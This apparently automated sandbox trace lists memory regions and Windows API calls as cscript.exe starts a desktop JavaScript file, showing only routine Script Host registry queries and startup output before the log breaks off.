start_va = 0x7fefb370000 end_va = 0x7fefb396fff entry_point = 0x7fefb370000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 284 start_va = 0x7fefb360000 end_va = 0x7fefb36afff entry_point = 0x7fefb360000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 285 start_va = 0x310000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 286 start_va = 0xb400000 end_va = 0xb742fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b400000" filename = "" Region: id = 287 start_va = 0x7fef4f10000 end_va = 0x7fef4f71fff entry_point = 0x7fef4f10000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 288 start_va = 0x7fefa000000 end_va = 0x7fefa01bfff entry_point = 0x7fefa000000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 289 start_va = 0x7fefa350000 end_va = 0x7fefa360fff entry_point = 0x7fefa350000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 290 start_va = 0xb900000 end_va = 0xb9fffff entry_point = 0x0 region_type = private name = "private_0x000000000b900000" filename = "" Region: id = 291 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 292 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 293 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 294 start_va = 0x7fef3b30000 end_va = 0x7fef3b38fff entry_point = 0x7fef3b30000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 295 start_va = 0x7580000 end_va = 0x767ffff entry_point = 0x0 region_type = private name = "private_0x0000000007580000" filename = "" Region: id = 296 start_va = 0x7fefc570000 end_va = 0x7fefc5c4fff entry_point = 0x7fefc570000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 297 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 298 start_va = 0x7fefbf70000 end_va = 0x7fefbf76fff entry_point = 0x7fefbf70000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 299 start_va = 0x76f50000 end_va = 0x76f52fff entry_point = 0x76f50000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 300 start_va = 0x7fefc080000 end_va = 0x7fefc09dfff entry_point = 0x7fefc080000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 301 start_va = 0x7fefc360000 end_va = 0x7fefc3b6fff entry_point = 0x7fefc360000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 302 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 303 start_va = 0x7fefb500000 end_va = 0x7fefb514fff entry_point = 0x7fefb500000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 304 start_va = 0x1d50000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 305 start_va = 0xba00000 end_va = 0xbbeffff entry_point = 0x0 region_type = private name = "private_0x000000000ba00000" filename = "" Region: id = 306 start_va = 0xb750000 end_va = 0xb8effff entry_point = 0x0 region_type = private name = "private_0x000000000b750000" filename = "" Region: id = 307 start_va = 0x7fef7590000 end_va = 0x7fef7597fff entry_point = 0x7fef7590000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 308 start_va = 0xb7b0000 end_va = 0xb8affff entry_point = 0x0 region_type = private name = "private_0x000000000b7b0000" filename = "" Region: id = 309 start_va = 0x7fefa5c0000 end_va = 0x7fefa5d4fff entry_point = 0x7fefa5c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 310 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 311 start_va = 0x7fefa5a0000 end_va = 0x7fefa5b8fff entry_point = 0x7fefa5a0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 312 start_va = 0x7fefa590000 end_va = 0x7fefa59afff entry_point = 0x7fefa590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 313 start_va = 0x7fefc560000 end_va = 0x7fefc566fff entry_point = 0x7fefc560000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 314 start_va = 0x7fefb210000 end_va = 0x7fefb262fff entry_point = 0x7fefb210000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 315 start_va = 0xbaa0000 end_va = 0xbb1ffff entry_point = 0x0 region_type = private name = "private_0x000000000baa0000" filename = "" Region: id = 316 start_va = 0xbbe0000 end_va = 0xbbeffff entry_point = 0x0 region_type = private name = "private_0x000000000bbe0000" filename = "" Region: id = 317 start_va = 0x7fef7730000 end_va = 0x7fef77a3fff entry_point = 0x7fef7730000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 318 start_va = 0x7fef5500000 end_va = 0x7fef550bfff entry_point = 0x7fef5500000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 452 start_va = 0x7fefb1c0000 end_va = 0x7fefb1d7fff entry_point = 0x7fefb1c1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 453 start_va = 0x7fefb1e0000 end_va = 0x7fefb1f0fff entry_point = 0x7fefb1e16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 454 start_va = 0xbdb0000 end_va = 0xbeaffff entry_point = 0x0 region_type = private name = "private_0x000000000bdb0000" filename = "" Region: id = 455 start_va = 0x7fefc1d0000 end_va = 0x7fefc1d9fff entry_point = 0x7fefc1d3cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 456 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 457 start_va = 0x1d50000 end_va = 0x1d51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d50000" filename = "" Region: id = 458 start_va = 0x1da0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 459 start_va = 0x7fefcb70000 end_va = 0x7fefcb7afff entry_point = 0x7fefcb71030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 460 start_va = 0x7fefc700000 end_va = 0x7fefc721fff entry_point = 0x7fefc700000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 461 start_va = 0x7fefc730000 end_va = 0x7fefc77dfff entry_point = 0x7fefc730000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 462 start_va = 0x7fefc210000 end_va = 0x7fefc25bfff entry_point = 0x7fefc210000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 463 start_va = 0x7fefc060000 end_va = 0x7fefc07afff entry_point = 0x7fefc062068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 464 start_va = 0x1d60000 end_va = 0x1d70fff entry_point = 0x1d60000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 465 start_va = 0xbbf0000 end_va = 0xbceffff entry_point = 0x0 region_type = private name = "private_0x000000000bbf0000" filename = "" Region: id = 466 start_va = 0x7fef35e0000 end_va = 0x7fef364efff entry_point = 0x7fef35e0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 467 start_va = 0x1d80000 end_va = 0x1d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 468 start_va = 0xbeb0000 end_va = 0xbfaffff entry_point = 0x0 region_type = private name = "private_0x000000000beb0000" filename = "" Region: id = 469 start_va = 0x2350000 end_va = 0x23fffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 470 start_va = 0x7fef3540000 end_va = 0x7fef35d8fff entry_point = 0x7fef3540000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 471 start_va = 0x1db0000 end_va = 0x1dd6fff entry_point = 0x1db28c4 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 472 start_va = 0x7fef2640000 end_va = 0x7fef2fdcfff entry_point = 0x7fef2640000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 473 start_va = 0x7fef1ca0000 end_va = 0x7fef263cfff entry_point = 0x7fef20ea300 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 474 start_va = 0xbfd0000 end_va = 0xc0cffff entry_point = 0x0 region_type = private name = "private_0x000000000bfd0000" filename = "" Region: id = 475 start_va = 0xc0d0000 end_va = 0xc1cffff entry_point = 0x0 region_type = private name = "private_0x000000000c0d0000" filename = "" Region: id = 476 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 477 start_va = 0xc1d0000 end_va = 0xc3cffff entry_point = 0x0 region_type = private name = "private_0x000000000c1d0000" filename = "" Region: id = 478 start_va = 0x7fef33d0000 end_va = 0x7fef353efff entry_point = 0x7fef33d0000 region_type = mapped_file name = "msado15.dll" filename = "\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll") Region: id = 479 start_va = 0x7fef3960000 end_va = 0x7fef3987fff entry_point = 0x7fef3960000 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 480 start_va = 0xc3d0000 end_va = 0xc4cffff entry_point = 0x0 region_type = private name = "private_0x000000000c3d0000" filename = "" Region: id = 481 start_va = 0xc4d0000 end_va = 0xc5cffff entry_point = 0x0 region_type = private name = "private_0x000000000c4d0000" filename = "" Region: id = 482 start_va = 0xc6f0000 end_va = 0xc7effff entry_point = 0x0 region_type = private name = "private_0x000000000c6f0000" filename = "" Region: id = 483 start_va = 0x7fefba70000 end_va = 0x7fefbb9bfff entry_point = 0x7fefba70000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 484 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 485 start_va = 0x1d90000 end_va = 0x1d91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d90000" filename = "" Region: id = 486 start_va = 0x7fef9630000 end_va = 0x7fef9686fff entry_point = 0x7fef9630000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 487 start_va = 0x1db0000 end_va = 0x1db1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 488 start_va = 0x7fef2d60000 end_va = 0x7fef2fd0fff entry_point = 0x7fef2d60000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 489 start_va = 0x7fef5eb0000 end_va = 0x7fef5eeafff entry_point = 0x7fef5eb0000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 490 start_va = 0x7fefa8d0000 end_va = 0x7fefaae4fff entry_point = 0x7fefa8d0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 491 start_va = 0x7fef6c10000 end_va = 0x7fef6c43fff entry_point = 0x7fef6c10000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 492 start_va = 0x76f60000 end_va = 0x76f66fff entry_point = 0x76f60000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 493 start_va = 0x7fef40e0000 end_va = 0x7fef4133fff entry_point = 0x7fef40e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 494 start_va = 0x7fef4140000 end_va = 0x7fef4cf6fff entry_point = 0x7fef4140000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 495 start_va = 0x1dc0000 end_va = 0x1dc0fff entry_point = 0x1dc0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 496 start_va = 0x1dd0000 end_va = 0x1dd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dd0000" filename = "" Region: id = 497 start_va = 0x7fefce70000 end_va = 0x7fefce89fff entry_point = 0x7fefce70000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 498 start_va = 0x7fefd070000 end_va = 0x7fefd0a5fff entry_point = 0x7fefd070000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 499 start_va = 0x7fefece0000 end_va = 0x7fefeeb6fff entry_point = 0x7fefece0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Thread: id = 1 os_tid = 0x9ac [0013.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f7d0 | out: lpSystemTimeAsFileTime=0x18f7d0*(dwLowDateTime=0x265ad60, dwHighDateTime=0x1d357fe)) [0013.079] GetCurrentProcessId () returned 0x9a8 [0013.079] GetCurrentThreadId () returned 0x9ac [0013.079] GetTickCount () returned 0x13542 [0013.079] QueryPerformanceCounter (in: lpPerformanceCount=0x18f7d8 | out: lpPerformanceCount=0x18f7d8*=300418413) returned 1 [0013.086] GetModuleHandleA (lpModuleName=0x0) returned 0xffa20000 [0013.086] GetVersionExA (in: lpVersionInformation=0x18f6c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f6c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0013.086] GetUserDefaultLCID () returned 0x409 [0013.087] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76c70000 [0013.087] GetProcAddress (hModule=0x76c70000, lpProcName="SetThreadUILanguage") returned 0x76c86d40 [0013.087] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0013.087] FreeLibrary (hLibModule=0x76c70000) returned 1 [0013.087] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\5P5NRG~1\\Desktop\\MYOBSU~1.JS\" " [0013.087] lstrlenW (lpString="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\5P5NRG~1\\Desktop\\MYOBSU~1.JS\" ") returned 75 [0013.087] GetCurrentThreadId () returned 0x9ac [0013.088] CoInitialize (pvReserved=0x0) returned 0x0 [0013.206] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f398 | out: phkResult=0x18f398*=0x88) returned 0x0 [0013.206] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f390 | out: phkResult=0x18f390*=0x8c) returned 0x0 [0013.206] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x18e698, lpData=0x18eaa0, lpcbData=0x18e690*=0x400 | out: lpType=0x18e698*=0x0, lpData=0x18eaa0*=0x1, lpcbData=0x18e690*=0x400) returned 0x2 [0013.206] RegQueryValueExW (in: hKey=0x88, lpValueName="Enabled", lpReserved=0x0, lpType=0x18e698, lpData=0x18eaa0, lpcbData=0x18e690*=0x400 | out: lpType=0x18e698*=0x0, lpData=0x18eaa0*=0x1, lpcbData=0x18e690*=0x400) returned 0x2 [0013.206] RegQueryValueExW (in: hKey=0x8c, lpValueName="Enabled", lpReserved=0x0, lpType=0x18e698, lpData=0x18eaa0, lpcbData=0x18e690*=0x400 | out: lpType=0x18e698*=0x0, lpData=0x18eaa0*=0x1, lpcbData=0x18e690*=0x400) returned 0x2 [0013.206] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0013.278] RegCloseKey (hKey=0x8c) returned 0x0 [0013.278] RegCloseKey (hKey=0x88) returned 0x0 [0013.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f0b0 | out: phkResult=0x18f0b0*=0x88) returned 0x0 [0013.278] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f0a8 | out: phkResult=0x18f0a8*=0x8c) returned 0x0 [0013.278] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x18e3b8, lpData=0x18e7c0, lpcbData=0x18e3b0*=0x400 | out: lpType=0x18e3b8*=0x0, lpData=0x18e7c0*=0x0, lpcbData=0x18e3b0*=0x400) returned 0x2 [0013.278] RegQueryValueExW (in: hKey=0x88, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x18e3b8, lpData=0x18e7c0, lpcbData=0x18e3b0*=0x400 | out: lpType=0x18e3b8*=0x0, lpData=0x18e7c0*=0x0, lpcbData=0x18e3b0*=0x400) returned 0x2 [0013.278] RegQueryValueExW (in: hKey=0x8c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x18e3b8, lpData=0x18e7c0, lpcbData=0x18e3b0*=0x400 | out: lpType=0x18e3b8*=0x0, lpData=0x18e7c0*=0x0, lpcbData=0x18e3b0*=0x400) returned 0x2 [0013.278] RegCloseKey (hKey=0x8c) returned 0x0 [0013.278] RegCloseKey (hKey=0x88) returned 0x0 [0013.278] GetACP () returned 0x4e4 [0013.278] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c70000 [0013.278] GetProcAddress (hModule=0x76c70000, lpProcName="HeapSetInformation") returned 0x76c8c4a0 [0013.278] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0013.278] FreeLibrary (hLibModule=0x76c70000) returned 1 [0013.279] CoRegisterMessageFilter (in: lpMessageFilter=0x45df90, lplpMessageFilter=0x45dfa0 | out: lplpMessageFilter=0x45dfa0*=0x0) returned 0x0 [0013.279] IUnknown:AddRef (This=0x45df90) returned 0x2 [0013.279] GetModuleFileNameW (in: hModule=0xffa20000, lpFilename=0x18f3f0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0013.279] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0x18ed40 | out: lpdwHandle=0x18ed40) returned 0x704 [0013.279] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x18e630 | out: lpData=0x18e630) returned 1 [0013.279] VerQueryValueW (in: pBlock=0x18e630, lpSubBlock="\\", lplpBuffer=0x18ed48, puLen=0x18ed44 | out: lplpBuffer=0x18ed48*=0x18e658, puLen=0x18ed44) returned 1 [0013.279] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ed98 | out: phkResult=0x18ed98*=0x88) returned 0x0 [0013.279] RegQueryValueExW (in: hKey=0x88, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x18e0e8, lpData=0x18e4f0, lpcbData=0x18e0e0*=0x400 | out: lpType=0x18e0e8*=0x0, lpData=0x18e4f0*=0x0, lpcbData=0x18e0e0*=0x400) returned 0x2 [0013.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ed50 | out: phkResult=0x18ed50*=0x8c) returned 0x0 [0013.279] RegQueryValueExW (in: hKey=0x8c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x18ed14, lpData=0x18ed90, lpcbData=0x18ed10*=0x4 | out: lpType=0x18ed14*=0x0, lpData=0x18ed90*=0xc0, lpcbData=0x18ed10*=0x4) returned 0x2 [0013.279] RegQueryValueExW (in: hKey=0x8c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x18e0e8, lpData=0x18e4f0, lpcbData=0x18e0e0*=0x400 | out: lpType=0x18e0e8*=0x0, lpData=0x18e4f0*=0x0, lpcbData=0x18e0e0*=0x400) returned 0x2 [0013.279] RegQueryValueExW (in: hKey=0x88, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x18ed14, lpData=0x18ed90, lpcbData=0x18ed10*=0x4 | out: lpType=0x18ed14*=0x0, lpData=0x18ed90*=0xc0, lpcbData=0x18ed10*=0x4) returned 0x2 [0013.279] RegQueryValueExW (in: hKey=0x88, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x18e0e8, lpData=0x18e4f0, lpcbData=0x18e0e0*=0x400 | out: lpType=0x18e0e8*=0x1, lpData="1", lpcbData=0x18e0e0*=0x4) returned 0x0 [0013.279] lstrlenW (lpString="1") returned 1 [0013.279] lstrlenW (lpString="0") returned 1 [0013.279] lstrlenW (lpString="1") returned 1 [0013.279] lstrlenW (lpString="no") returned 2 [0013.279] lstrlenW (lpString="1") returned 1 [0013.279] lstrlenW (lpString="false") returned 5 [0013.279] RegCloseKey (hKey=0x8c) returned 0x0 [0013.279] RegCloseKey (hKey=0x88) returned 0x0 [0013.279] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x18ed98, lpdwDisposition=0x0 | out: phkResult=0x18ed98*=0x88, lpdwDisposition=0x0) returned 0x0 [0013.280] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x18ed34, lpData=0x18ed90, lpcbData=0x18ed30*=0x4 | out: lpType=0x18ed34*=0x0, lpData=0x18ed90*=0xc0, lpcbData=0x18ed30*=0x4) returned 0x2 [0013.280] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x18e108, lpData=0x18e510, lpcbData=0x18e100*=0x400 | out: lpType=0x18e108*=0x1, lpData="1", lpcbData=0x18e100*=0x4) returned 0x0 [0013.280] lstrlenW (lpString="1") returned 1 [0013.280] lstrlenW (lpString="0") returned 1 [0013.280] lstrlenW (lpString="1") returned 1 [0013.280] lstrlenW (lpString="no") returned 2 [0013.280] lstrlenW (lpString="1") returned 1 [0013.280] lstrlenW (lpString="false") returned 5 [0013.280] RegCloseKey (hKey=0x88) returned 0x0 [0013.280] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x18ed98, lpdwDisposition=0x0 | out: phkResult=0x18ed98*=0x88, lpdwDisposition=0x0) returned 0x0 [0013.280] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x18ed34, lpData=0x18ed90, lpcbData=0x18ed30*=0x4 | out: lpType=0x18ed34*=0x0, lpData=0x18ed90*=0xc0, lpcbData=0x18ed30*=0x4) returned 0x2 [0013.280] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x18e108, lpData=0x18e510, lpcbData=0x18e100*=0x400 | out: lpType=0x18e108*=0x0, lpData=0x18e510*=0x31, lpcbData=0x18e100*=0x400) returned 0x2 [0013.280] RegCloseKey (hKey=0x88) returned 0x0 [0013.280] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\Desktop\\MYOBSU~1.JS") returned 37 [0013.280] lstrlenW (lpString="JS") returned 2 [0013.280] lstrlenW (lpString="WSH") returned 3 [0013.280] LoadStringW (in: hInstance=0xffa20000, uID=0x834, lpBuffer=0x18dc90, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70 [0013.280] FormatMessageW (in: dwFlags=0x500, lpSource=0x37fe38, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x18ec78, nSize=0x0, Arguments=0x18ece8 | out: lpBuffer="7") returned 0x6a [0013.280] LocalFree (hMem=0x37eca0) returned 0x0 [0013.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0013.281] lstrlenW (lpString="Microsoft (R) Windows Script Host Version 5.8\r\nCopyright (C) Microsoft Corporation. All rights reserved.\r\n") returned 106 [0013.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18ea48 | out: lpMode=0x18ea48) returned 1 [0013.282] WriteConsoleW (in: 